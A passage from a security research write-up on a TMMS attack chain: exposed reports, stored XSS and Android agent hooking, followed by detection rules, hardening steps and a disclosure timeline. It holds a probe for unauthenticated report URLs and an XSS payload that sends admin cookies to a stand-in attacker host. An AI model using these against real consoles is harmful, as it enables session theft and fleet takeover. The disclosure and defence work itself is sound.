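    """True if the report returns 200 with no cookie or auth header sent."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status == 200
    except OSError:
        return False

# for url in report_urls("https://tmms.example.com"):  # hypothetical host
#     print(url, answers_without_session(url))
```

If any of these answer 200 from an unenrolled network position, the fleet’s telemetry is public and the target-selection phase described above costs the attacker nothing.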
Weaponization then happens inside the vendor’s trust boundary. Because the Android agent forwards device metadata through “/officescan/PLS_TMMS_CGI/cgiosmaUpload.dll”, and the console later renders it without output encoding, a crafted value such as an application’s “appName” becomes stored code in the admin’s browser. One click on “Application_Inventory_Report.htm” is enough to execute attacker-controlled JavaScript, read the console session, and pivot to authenticated console APIs. At that point, an operator isn’t just viewing the dashboard; they are the dashboard.
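The root cause is missing output encoding, and the fix is one function call. A minimal sketch of both behaviors, using Python’s standard html module and a hypothetical report-row template (the real console’s templating is different; this only illustrates the class of bug):

```python
import html

def render_row_unsafe(app_name: str) -> str:
    """How the vulnerable report behaves: metadata interpolated verbatim."""
    return f"<td>{app_name}</td>"

def render_row_safe(app_name: str) -> str:
    """Output-encoded rendering neutralizes the same payload."""
    return f"<td>{html.escape(app_name)}</td>"

# Hypothetical malicious appName reported by a device.
payload = '<script>new Image().src="//evil.example/c?"+document.cookie</script>'

print(render_row_unsafe(payload))  # script tag survives into the admin's DOM
print(render_row_safe(payload))    # rendered as inert &lt;script&gt;... text
```

The unsafe row carries the attacker’s script into the admin’s DOM on the next report view; the escaped row displays the same bytes as harmless text, which is exactly the control the console was missing.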
Control of the management plane turns telemetry into a distribution channel. With an admin’s cookies and API reach, an APT can push a “support” APK, alter policy, or stage a trojanized agent build (common in fleets that sideload or use internal EMM stores). The next scheduled Scan becomes the delivery trigger. When the agent reaches “DeviceUtil.c(android.content.Context)” during posture checks, the runtime is already under the operator’s influence; the same hook demonstrated in the lab fires on-device, opening an interactive session inside the agent’s process while the UI proceeds normally. This is not memory corruption; it’s coercion of a legitimate process spawned on a routine path, which makes it operationally quiet.
From that vantage point, impact compounds quickly. The shell inherits the agent’s sandbox identity, network allow-listing, and visibility of local state. Adversaries can poison outbound telemetry (hide findings, fabricate “clean” results), exfiltrate via whitelisted endpoints that defenders expect to see, and speak on SSL-pinned channels as the app. Policy artifacts, enrollment tokens, VPN profiles, and cached reports become loot; where deployments permit it, operators can drive silent install/uninstall or enforced updates. The console’s trust in the agent’s truth is the blast multiplier: once the truth is malleable, incident responders are flying blind.
For APT tradecraft, the playbook writes itself: use the console compromise (Vulnerability 2) as the distribution lever, land instrumentation across a segment of the fleet, and let scheduled Scans supply periodic C2 beacons (Vulnerability 3). Blend actions into expected patterns (scan timings, report fetches, policy syncs) so dwell time stretches. On already-compromised or stolen devices, the agent-level foothold becomes a post-exploitation kit to keep control without rooting. Social angles add pressure: a scripted console can present brand-consistent compliance prompts to phish MFA or VPN secrets, or push a “company security update” that is, in reality, the payload.
For red teams, the same chain is a high-fidelity exercise in defender deception, demonstrating that a trusted mobile security stack can be turned against itself. It measures SOC visibility when telemetry is falsified at the source and validates controls around software distribution and device attestation.
Trend Micro confirmed the report exposure and the stored XSS; their stance on the scan-time runtime coercion was that behavior requiring a modified environment falls outside the standard Play channel. That may hold for consumers, but it does not neutralize enterprise reality: sideloaded agents, internal app catalogs, debug/test devices, and admin-driven distribution exist. In those environments, the chain above is both practical and repeatable.
Net effect: confidentiality is compromised at the reconnaissance scale (Vulnerability 1), integrity is subverted at the management plane (Vulnerability 2), and control is gained at the endpoint, within the very agent meant to defend it (Vulnerability 3). In aggregate, the finding challenges an industry assumption that security tooling is a one-way asset. Here, the tooling became the supply-chain pivot, the C2 trigger, and the camouflage. In terms of composite severity, the flaws in TMMS enabled a complete compromise chain. Organizations using TMMS (or any similar solution) should recognize that their security console is as important to protect as their crown-jewel servers. If an attacker holds the keys to your security dashboard, they hold the keys to your kingdom.
Detection & Hardening for TMMS Admins
We’ve just shown how a determined operator can move from public report views -> console code execution via stored XSS -> runtime control inside the Android agent. The story below keeps the same outside-in cadence as the attack, but every control is in your hands as a platform owner or admin.
Lock down where reports live and who can reach them. Treat the report repository as Tier-0 data, not a “convenience export”. Keep the TMMS web tier off the public Internet; front it with a VPN or a zero-trust gateway, and restrict access to named admin groups and fixed source networks. At the edge, explicitly block direct access to the report output paths except from the console UI itself. If your reverse proxy supports it, inject defensive headers (Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, Referrer-Policy). This is all doable without any product change.
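At the reverse proxy, that block-and-header posture can be sketched in a few lines of nginx configuration (the admin CIDR is a hypothetical placeholder; adapt the paths and policy values to your deployment and test the CSP against the console before enforcing it):

```nginx
# Deny the report repository to everything except named admin networks.
location /mdm/web/repository/report/manual/output/ {
    allow 10.20.0.0/24;   # hypothetical admin VPN range
    deny  all;
}

# Defensive headers on everything the console serves.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'" always;
add_header X-Content-Type-Options "nosniff" always;
add_header X-Frame-Options "DENY" always;
add_header Referrer-Policy "no-referrer" always;
```

Even a permissive CSP that merely forbids inline script would have blunted the stored-XSS step of this chain, which is why the header belongs at the proxy regardless of product patch status.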
Make the management plane a place attackers can’t casually stand. Put the console on an internal segment with a private hostname; guard it with SSO + MFA and network-level ACLs. Give admins individual accounts (no shared roots), short session lifetimes, and break-glass credentials stored offline. Separate duties so the person who can push software/policies is not the same person who can approve them. Build a change window: any mass action (e.g., “Send” reports, deploy a new agent) requires a ticket ID and two approvals.
Watch for the exact footsteps this chain leaves. Ship web and app logs to your SIEM and write detections aligned with the findings:
- Any hit to “/repository/report/manual/output/*.htm” from a non-admin source or outside business hours.
- Report views whose referrer is an external email or chat (classic phish bait).
- Device metadata that suddenly contains HTML/script tokens (e.g., “appName” including “<” or “>”).
- Spikes in “View/Send” actions or policy pushes by a single admin.
- Devices that contact unfamiliar IPs during scan windows (when our hook would dial out).
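As a concrete example of the metadata rule, a SIEM-side check for markup sneaking into device-supplied fields might look like the following sketch (the field names are assumptions; map them to whatever your log pipeline actually emits):

```python
import re

# HTML/script tokens that have no business in an app or device name.
MARKUP = re.compile(r"[<>]|&#x?[0-9a-f]+;|javascript:", re.IGNORECASE)

def suspicious_metadata(record: dict) -> list[str]:
    """Return the metadata fields (hypothetical names) that look like injection."""
    fields = ("appName", "deviceName", "model")
    return [f for f in fields if MARKUP.search(str(record.get(f, "")))]

print(suspicious_metadata({"appName": "<script>alert(1)</script>"}))  # ['appName']
print(suspicious_metadata({"appName": "WhatsApp", "model": "Pixel 7"}))  # []
```

Run this at ingest time, before records reach the console’s rendering path, so an injection attempt raises an alert even if the report page itself is never opened.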
Operate the Android fleet to deny easy delivery. Enforce Managed Google Play for agent installs; block Unknown Sources and sideloading in production. Pin the vendor’s signing certificate in your EMM policy so a repackaged “company security update” can’t be enrolled. Disable Developer Options and USB debugging; require hardware-backed attestation/Play Integrity for enrollment and on each compliance check. Keep OS patches current and quarantine devices that fail attestation or run untrusted builds. These are standard EMM controls you can turn on now.
Assume compromise and plan the first ten minutes. If your SOC sees the IOCs above, have a pre-approved playbook: expire all console sessions; temporarily block report output paths at the reverse proxy; rotate admin passwords/keys; reissue an agent enrollment token; isolate suspected devices; and re-generate reports after cleanup. Search server logs for uploads to the app-inventory endpoint with suspicious names and for unauthenticated reads of report pages. This keeps an incident bounded to hours, not days.
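The log search in that playbook can be scripted ahead of time. A sketch assuming standard access logs, keyed to the report and upload endpoints named earlier in this write-up:

```python
import re
from typing import Iterable

# Reads of report pages and uploads to the inventory endpoint.
IOC_PATHS = re.compile(
    r"/mdm/web/repository/report/manual/output/|"
    r"/officescan/PLS_TMMS_CGI/cgiosmaUpload\.dll"
)

def ioc_lines(log_lines: Iterable[str]) -> list[str]:
    """Return access-log lines touching the endpoints abused in this chain."""
    return [line for line in log_lines if IOC_PATHS.search(line)]

# Illustrative log lines (hypothetical IPs and paths).
sample = [
    '203.0.113.9 - - "GET /mdm/web/repository/report/manual/output/Security_Scan_Report.htm HTTP/1.1" 200',
    '10.0.0.4 - admin "GET /mdm/web/console/home HTTP/1.1" 200',
]
print(ioc_lines(sample))  # only the report read is flagged
```

Pair the hits with source-IP reputation and business-hours checks from the detection list above, and the triage step of the first ten minutes becomes a script run rather than an ad-hoc grep.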
Drill the chain as a purple-team exercise. Don’t just pentest the app; rehearse the whole story. Start with an external surface scan to confirm the console and report paths are off-Internet. Simulate a malicious app name flowing into a test console and verify your proxy headers and SIEM rules catch it. Tabletop a mass policy push and require dual approval to proceed. Finally, on an isolated lab device, run a controlled scan during which your network team validates that egress filters catch unexpected callbacks. Document gaps and turn them into tickets, then rerun the drill quarterly.
Treat TMMS as Tier-0 infrastructure. Backups, OS hardening, and patch SLAs for the TMMS host should match your domain controllers and IdP. Patch immediately when updates ship; the hours after a CVE drops are when copy-paste exploits hit the wild. Keep the console behind named networks, keep admins on SSO + MFA, keep devices on managed distribution, and keep testing that those controls actually work.
If you adopt the posture above, the same kill chain that was viable in our lab becomes brittle in your environment: the report surface isn’t reachable from the outside, the console can’t be driven through a browser trick, and scans don’t occur on devices that allow opportunistic instrumentation or sideloaded agents. That’s how you run a security platform as if an APT is already looking for its weak seams, because they are.
Responsible Disclosure
As soon as the findings were repeatable end-to-end, I moved the work out of the lab and into a responsible disclosure track with Trend Micro. The goal was simple: give the vendor enough technical depth to reproduce each issue without publishing weaponized detail, keep communication tight and verifiable, and provide a clear path from report to fix to public learning.
The first message summarized the vulnerabilities, attached the proof-of-impact artifacts, and anchored the report to concrete URLs inside the TMMS console. That initial note kicked off a thread where I answered follow-up questions, sent sanitized videos, and shared PoCs. Over the weeks that followed, Trend Micro acknowledged the XSS and information disclosure. For the command-execution research on the Android agent, the Trend Micro team clarified their position, stating that behavior requiring a modified environment (e.g., instrumentation or repackaged builds) is out of scope for Play-distributed users, while still being useful to discuss for enterprise deployments and red-team simulations. The disclosure process concluded positively: the case was tracked internally by Trend Micro, and my work was acknowledged in their public statements.
Trend Micro’s acknowledgment page for 2025, highlighting the inclusion of Lucas Luriel Carmo (Hakai Security).
Vendor stance on Vulnerability 3: in the email, the product team stated that behavior requiring rooting or a modified APK (e.g., Frida/gadget or a repack) is out of scope for normal Google Play users. I agree that this reduces consumer risk; however, enterprise fleets often sideload agents or run debug/test builds, where this execution path becomes applicable to red-team and APT tradecraft.
I kept testing in an isolated lab, redacted customer identifiers, avoided targeting production systems, and limited public details to what defenders need (affected surfaces, conditions, and mitigations). Wherever a proof of concept could lead to immediate harm, I provided it privately to the vendor and withheld it here.
Disclosure Timeline
To keep the process transparent, here is the chronological arc from first commit to publication. Research started in January 2024 with reconnaissance and tooling. By April 2024, the vulnerabilities were validated and privately reported to Trend Micro with reproducible steps and artifacts. Triage and engineering review proceeded throughout the year; in February 2025, the work was added to Trend Micro’s public acknowledgments. A first talk on the research, “Who Scans the Scanner?”, was presented at BSides Las Vegas (August 2025) and OrangeCon (September 2025). This article accompanies the talk, with broader write-ups planned after vendor remediation windows are complete.
Conclusion
“Who scans the scanner?” stopped being a slogan and became a blueprint. In this work, we walked a complete chain (public report surface -> web-console code execution via stored XSS -> runtime control inside the Android agent) to show how a product that guards the fleet can also become the path into it. None of the steps relied on magic; they exploited design assumptions and trust boundaries that exist precisely because TMMS is allowed to see and do more than ordinary apps.
For APT operators, that combination is irresistible: a management plane that aggregates visibility, a console that administrators trust, and an agent that runs with privileged reach. Our lab demonstration stays true to that reality. We didn’t chase a one-off crash; we proved that normal operational flows (reporting and scanning) can be coerced into transport and control. That is the lesson to carry forward: in the supply chain of enterprise mobility, security tooling itself sits at a high-leverage junction and must be treated as Tier-0.
This isn’t vendor-bashing; it’s an argument for rigor. We disclosed responsibly, validated fixes where possible, and turned the findings into customer-side guidance: keep TMMS off the public internet, operate the console behind a strong identity, enforce managed distribution on devices, watch for the exact footprints this chain leaves, and rehearse the scenario as a purple-team exercise. Those are controls you can apply today, independent of any patch cadence.
The broader point is simple: trust is a target. Security products deserve the same adversarial testing we apply to identity providers, hypervisors, and domain controllers. If we treat scanners as Tier-0, verify their assumptions, and continuously instrument our environments to catch abuse of their workflows, we deny adversaries the leverage they seek.
So who scans the scanner? We do: researchers, red teams, blue teams, and the operators who run these platforms every day. Today, we mapped the seams in TMMS. Tomorrow, we use that map to harden our own environments and to keep pressure on the places where trust concentrates. Shields still crack; our job is to find the stress lines first and keep the defenses evolving.